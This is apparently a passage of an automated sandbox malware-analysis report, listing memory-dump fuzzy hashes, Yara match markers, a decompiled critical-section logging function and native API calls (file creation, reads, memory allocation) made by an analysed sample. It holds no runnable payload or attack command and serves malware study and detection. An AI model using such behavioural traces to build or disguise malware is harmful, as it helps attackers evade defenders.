                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                          • Instruction ID: 4776af5d194441824eadf0aaa75e79685b2abbd4e726c1673d11db526659b40e
                                                          • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                          • Instruction Fuzzy Hash: C201F4336006809BD326A75DD844FA9BBD8EF92B54F0A00B1FA558BAB6D778C800C315
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7d87e973599ec974d5bb572f514ca5e2d3c905df74cf187d8124a245cda145c4
                                                          • Instruction ID: 1d663b867ef8dbe2388e96f859f373904b941d7aff998471c9f260e4d55aa251
                                                          • Opcode Fuzzy Hash: 7d87e973599ec974d5bb572f514ca5e2d3c905df74cf187d8124a245cda145c4
                                                          • Instruction Fuzzy Hash: 87016270A00209EFCB14DFACD542AAEBBF4EF08704F504169B554EB382D635D902CB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a817f5f36234182370c6f2affeec42823c98e2d9683fd82b6a9f3ceb460c5b9
                                                          • Instruction ID: 0989cf8c8ed571466c8932089cb0c303aae1f778c024d1f52b4330e199e98fed
                                                          • Opcode Fuzzy Hash: 6a817f5f36234182370c6f2affeec42823c98e2d9683fd82b6a9f3ceb460c5b9
                                                          • Instruction Fuzzy Hash: 89014F71A0520DAFCB04EFA9D545AAEBBF4FF18700F404069F945EB781E634DA00CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b6573e2181e82e46005dd6831894b184aa4f086d719f6a27433e7e4ba87b3d0a
                                                          • Instruction ID: a69e142970b3403c012d4db0b1d239913e2e3208e940ef03e681648d8efc7acf
                                                          • Opcode Fuzzy Hash: b6573e2181e82e46005dd6831894b184aa4f086d719f6a27433e7e4ba87b3d0a
                                                          • Instruction Fuzzy Hash: 67014474A0020DAFDB04EFA8D545AAEB7F4EF18300F508059B945EB380DB34DA00CF95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b457b3cfb227fb87c86552d1f297ed2d0affe5972fd7eed0d5312d9d73723c9
                                                          • Instruction ID: fbb2f517c413feb49eaa248c03983160607d45b6f253f9e36b37a8a5a54897fb
                                                          • Opcode Fuzzy Hash: 2b457b3cfb227fb87c86552d1f297ed2d0affe5972fd7eed0d5312d9d73723c9
                                                          • Instruction Fuzzy Hash: 1DF06271A04248EFDB14EFA9D406AAEBBF4EF18300F444069BA55EB381E674DA00CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58407a09824562d18bce48bc40b1dbc448dbef56508518bf67eb31326dc9f96b
                                                          • Instruction ID: 981445853d576c58f84d15a742f046b39275e47bfa0e4e42235f00307f098d08
                                                          • Opcode Fuzzy Hash: 58407a09824562d18bce48bc40b1dbc448dbef56508518bf67eb31326dc9f96b
                                                          • Instruction Fuzzy Hash: A7F0FAB29113909EF7B6832CC304B227FE99B15230FC484AED5C78320AC2A0CCC0C240
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f03a51043f15ca0082633dfa47f0d9dd4eec0d298471cddbcf172c27ed12efc4
                                                          • Instruction ID: 1f11f62917d4992e1097d4d70fc4940e43d50479398dab61051c2cacc348bb19
                                                          • Opcode Fuzzy Hash: f03a51043f15ca0082633dfa47f0d9dd4eec0d298471cddbcf172c27ed12efc4
                                                          • Instruction Fuzzy Hash: A4F0B470A046099FDB18FFB8D442BAE77B4EF18300F508099E905EB280DA34D900CB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c08e0ea59aa0cc7e532668b62d336ec8acc5efc4aa9fcee55bec7cd49f08ca9
                                                          • Instruction ID: 281ca65f7a94d39df30790406e616d3031726d526b571237e82ad0eb53bc669b
                                                          • Opcode Fuzzy Hash: 9c08e0ea59aa0cc7e532668b62d336ec8acc5efc4aa9fcee55bec7cd49f08ca9
                                                          • Instruction Fuzzy Hash: B9F0552A4256954ADF3F6B6C31003E93FB6E765114F890095D4B05730AC73589E3CB30
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                          • Instruction ID: 117ae490dcadaa3505000fcbe5955b464e9c7050113f6f08a4d54995f5d3a0bc
                                                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                          • Instruction Fuzzy Hash: 89E0ED322406016BE7619F0ACC81B8736A9AF92724F04407CBA005E282CAE6D80887A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8492b884239d5ca5046c459efce0d49b7d018a16712cafcbbbd2b164c1d9dd7a
                                                          • Instruction ID: 5bc44fa2603522cb00724e327df4c18e4ff01ee4ca7271bcb6291baf465da229
                                                          • Opcode Fuzzy Hash: 8492b884239d5ca5046c459efce0d49b7d018a16712cafcbbbd2b164c1d9dd7a
                                                          • Instruction Fuzzy Hash: 769002B161100042D50961D956047060045A7E1341F51C016A2145558CC6E98C616165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c22bb3cd4f8e18c3c53ac0d62db9d65268749a216b37b84c69a78e82e4f07c1
                                                          • Instruction ID: e897d282e921a99ad5dccaf70b079e1fe6653431d43513ee04a0c42ef28ffde0
                                                          • Opcode Fuzzy Hash: 0c22bb3cd4f8e18c3c53ac0d62db9d65268749a216b37b84c69a78e82e4f07c1
                                                          • Instruction Fuzzy Hash: FB90027160100802D50961D95A046860005A7D0341F51C015A6015659ED7E588917171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9dd0d863877cd83c9a7b9f2d7ad0b337b827e37b7982ce5ef3d9305d9bb596c8
                                                          • Instruction ID: d84271b4042756854868afd849ded3c94c53c0624b7fbfd21c91c990c76eaa35
                                                          • Opcode Fuzzy Hash: 9dd0d863877cd83c9a7b9f2d7ad0b337b827e37b7982ce5ef3d9305d9bb596c8
                                                          • Instruction Fuzzy Hash: 6A90027164100402D54671D956046060009B7D0381F91C016A0415558EC7D58A56BAA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e5ca15c2072cf6af8a11fc22c1442fcc4171dfbe9fdb815fa8964051c965ee85
                                                          • Instruction ID: 2d02b62a983d6cffe4aa1e31a59cca03ef7949e5f59deb8f96daa1a1d4b3a03d
                                                          • Opcode Fuzzy Hash: e5ca15c2072cf6af8a11fc22c1442fcc4171dfbe9fdb815fa8964051c965ee85
                                                          • Instruction Fuzzy Hash: 5A9002B1A01140434945B1D95A044065015B7E1341391C125A0445564CC7E88855A2A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 18991e392b65abcff69096f91da0824a64e8bd4fd3691dbc6987e8c50e6e9767
                                                          • Instruction ID: 63f2cb14097e1d122272a423a8f0d6278272abe9db10a52d16f64e238b2036f0
                                                          • Opcode Fuzzy Hash: 18991e392b65abcff69096f91da0824a64e8bd4fd3691dbc6987e8c50e6e9767
                                                          • Instruction Fuzzy Hash: A490027170100402D50761D956146060009E7D1385F91C016E1415559DC7E58953B172
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b0a94bc515b76c7ce5d16b366b7c457f9bba6697a55de5fb221a25e98d2a1950
                                                          • Instruction ID: 7aba5fa7b604d37544dd5157538e849125b873452414abcc80bfb39587b8b49d
                                                          • Opcode Fuzzy Hash: b0a94bc515b76c7ce5d16b366b7c457f9bba6697a55de5fb221a25e98d2a1950
                                                          • Instruction Fuzzy Hash: 7B90027164100802D54571D996147070006E7D0741F51C015A0015558DC7D6896576F1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 45c29989cd56ab9d6700d5282aa919cc7db51b1a73cac5a749f4e49ee4b40420
                                                          • Instruction ID: 9ae70f672fa2f574a72f9687f92528d8fec9a34088b2d4c7fd1419df4d653306
                                                          • Opcode Fuzzy Hash: 45c29989cd56ab9d6700d5282aa919cc7db51b1a73cac5a749f4e49ee4b40420
                                                          • Instruction Fuzzy Hash: 06900271701000529905A6D96A04A4A4105A7F0341B51D019A4005558CC6D488616161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c54f38cc6a9367760311a08ee3da1b445e776da309a3a70acd127ae9ac16de49
                                                          • Instruction ID: 317169a68c334021f5a036e84f10f5c8159a2d3e757a2e7d5d2ba7f24198897f
                                                          • Opcode Fuzzy Hash: c54f38cc6a9367760311a08ee3da1b445e776da309a3a70acd127ae9ac16de49
                                                          • Instruction Fuzzy Hash: C8900271A0500402D54571D966187060015A7D0341F51D015A0015558DC7D98A5576E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4be914d9cd0925ed85ff394d4ae4d8a2694c19face177f028054307cefb34a9c
                                                          • Instruction ID: d5cd2fbdd9b276131ba149b87772651e7e0ebe8ce4abe4b0d77f2db181fb0d0b
                                                          • Opcode Fuzzy Hash: 4be914d9cd0925ed85ff394d4ae4d8a2694c19face177f028054307cefb34a9c
                                                          • Instruction Fuzzy Hash: D390047170100403D50571DD770C7070005F7D0341F51D415F041555CDD7D7CC517171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 90a4325f5f20c507d17a91e1539be3c3513337036c532c714af39b8c46d6b559
                                                          • Instruction ID: b82f8d17fcce39cd656a51175c438180277d136f400d1695c4bdf1690c94c960
                                                          • Opcode Fuzzy Hash: 90a4325f5f20c507d17a91e1539be3c3513337036c532c714af39b8c46d6b559
                                                          • Instruction Fuzzy Hash: 2090027160504442D50565D96608A060005A7D0345F51D015A1055599DC7F58851B171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c69a281a8cf8154349bf97579b831516a0e2d6fcbc902d936c0bf71423431dd3
                                                          • Instruction ID: 914bdef2c311007e32b9389ee2b981f77d5ce224028db100dcd47541e89c04be
                                                          • Opcode Fuzzy Hash: c69a281a8cf8154349bf97579b831516a0e2d6fcbc902d936c0bf71423431dd3
                                                          • Instruction Fuzzy Hash: 7990027560504442D90565D96A04A870005A7D0345F51D415A041559CDC7D48861B161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 40727d1f634d774d02e258670c35dc68cc60ed0442292c7bad6c6286caa566b5
                                                          • Instruction ID: 24946a14830f6f4ae980ed136cc74b1d73ed8e852415d2cd0fe7c4f79e9c28af
                                                          • Opcode Fuzzy Hash: 40727d1f634d774d02e258670c35dc68cc60ed0442292c7bad6c6286caa566b5
                                                          • Instruction Fuzzy Hash: DE90027160144002D54571D9964460B5005B7E0341F51C415E0416558CC7D58856A261
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 852fc38295eb1d574ecdcaf90d585f6cb05d5e8b8f353ff26fa28e6d257c5f35
                                                          • Instruction ID: 156885876f292487b950adc1625278ad5e1ac55ae6d397bc4f0dac320c0ea249
                                                          • Opcode Fuzzy Hash: 852fc38295eb1d574ecdcaf90d585f6cb05d5e8b8f353ff26fa28e6d257c5f35
                                                          • Instruction Fuzzy Hash: F8900271A0500802D55571D956147460005A7D0341F51C015A0015658DC7D58A5576E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fdb0ef492e07b8de2288e0a86e14b86b5a1b8bfda0571c111c9857d1ce1f4527
                                                          • Instruction ID: 3d4d0aa81376ecb7814e1490ed1456fe7b9497aa0139d5f5ca5d9bac80580023
                                                          • Opcode Fuzzy Hash: fdb0ef492e07b8de2288e0a86e14b86b5a1b8bfda0571c111c9857d1ce1f4527
                                                          • Instruction Fuzzy Hash: 5090027160140402D50561D95A087470005A7D0342F51C015A5155559EC7E5C8917571
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 392593e281beae596ddd864f25c405f79e24aa3b3a4600763180b4ec57272f95
                                                          • Instruction ID: 4d8e31a7e43ccca69c778ed29bd280171c0b637b6961dcdb197d99ce47f59523
                                                          • Opcode Fuzzy Hash: 392593e281beae596ddd864f25c405f79e24aa3b3a4600763180b4ec57272f95
                                                          • Instruction Fuzzy Hash: CD90027160504842D54571D95604A460015A7D0345F51C015A0055698DD7E58D55B6A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 96cd265355e0b5a92249efab1555b74f03a647e10dc5aee094ebf94a46519c41
                                                          • Instruction ID: efa4f12146823e4a84f15b08ac7e649b9ae7b961f2e2d9e8f162b02f51f91c45
                                                          • Opcode Fuzzy Hash: 96cd265355e0b5a92249efab1555b74f03a647e10dc5aee094ebf94a46519c41
                                                          • Instruction Fuzzy Hash: A090027160144442D54562D95A04B0F4105A7E1342F91C01DA4147558CCAD588556761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dad37e4eca691e81d1aea2338d8a48cd261f7fb02ffdbb638b78d10b5b5b55dc
                                                          • Instruction ID: 7b438a89f0d56d91ecccd4ec9e28c9abf4c1b66b100fae670ef48f29d20685a6
                                                          • Opcode Fuzzy Hash: dad37e4eca691e81d1aea2338d8a48cd261f7fb02ffdbb638b78d10b5b5b55dc
                                                          • Instruction Fuzzy Hash: 4190027160100842D50561D95604B460005A7E0341F51C01AA0115658DC7D5C8517561
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: 93f274c54b82353db9cf7ffc6b3f85f9f96d7f4fb82dbc89b857f5f220da980b
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E0114FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                          				void* _t7;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t10;
                                                          				intOrPtr* _t12;
                                                          				intOrPtr* _t13;
                                                          				intOrPtr _t14;
                                                          				intOrPtr* _t15;
                                                          
                                                          				_t13 = __edx;
                                                          				_push(_a4);
                                                          				_t14 =  *[fs:0x18];
                                                          				_t15 = _t12;
                                                          				_t7 = E010FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                          				_push(_t13);
                                                          				E01145720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                          				_t9 =  *_t15;
                                                          				if(_t9 == 0xffffffff) {
                                                          					_t10 = 0;
                                                          				} else {
                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                          				}
                                                          				_push(_t10);
                                                          				_push(_t15);
                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                          				return E01145720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                          			}











                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0114FDFA
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0114FE01
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0114FE2B
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 4bad1db470ee570beba5a4ce279f1947e9b46b179cfb4adfa3e9889e8fcfb933
                                                          • Instruction ID: fbb28d2d54a775c3538ff13e23c531249c72b50af1b8ebceb5f8e62fc96baed8
                                                          • Opcode Fuzzy Hash: 4bad1db470ee570beba5a4ce279f1947e9b46b179cfb4adfa3e9889e8fcfb933
                                                          • Instruction Fuzzy Hash: C1F0F632240602BFE6281B89DC02F63BF5AEB44B71F150328F6685A5D1DA62F82086F0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,008E3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,008E3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 008E863D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtReadFile.NTDLL(008E3D82,5E972F65,FFFFFFFF,008E3A41,?,?,008E3D82,?,008E3A41,FFFFFFFF,5E972F65,008E3D82,?,00000000), ref: 008E86E5
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtReadFile.NTDLL(008E3D82,5E972F65,FFFFFFFF,008E3A41,?,?,008E3D82,?,008E3A41,FFFFFFFF,5E972F65,008E3D82,?,00000000), ref: 008E86E5
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,008D2D11,00002000,00003000,00000004), ref: 008E8809
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,008D2D11,00002000,00003000,00000004), ref: 008E8809
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtClose.NTDLL(008E3D60,?,?,008E3D60,00000000,FFFFFFFF), ref: 008E8745
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.514724044.00000000008D0000.00000040.00020000.sdmp, Offset: 008D0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000012.00000002.520500167.0000000004C80000.00000040.00000001.sdmp, Offset: 04C80000, based on PE: true
                                                          • Associated: 00000012.00000002.520804726.0000000004D9B000.00000040.00000001.sdmp
                                                          • Associated: 00000012.00000002.520823591.0000000004D9F000.00000040.00000001.sdmp
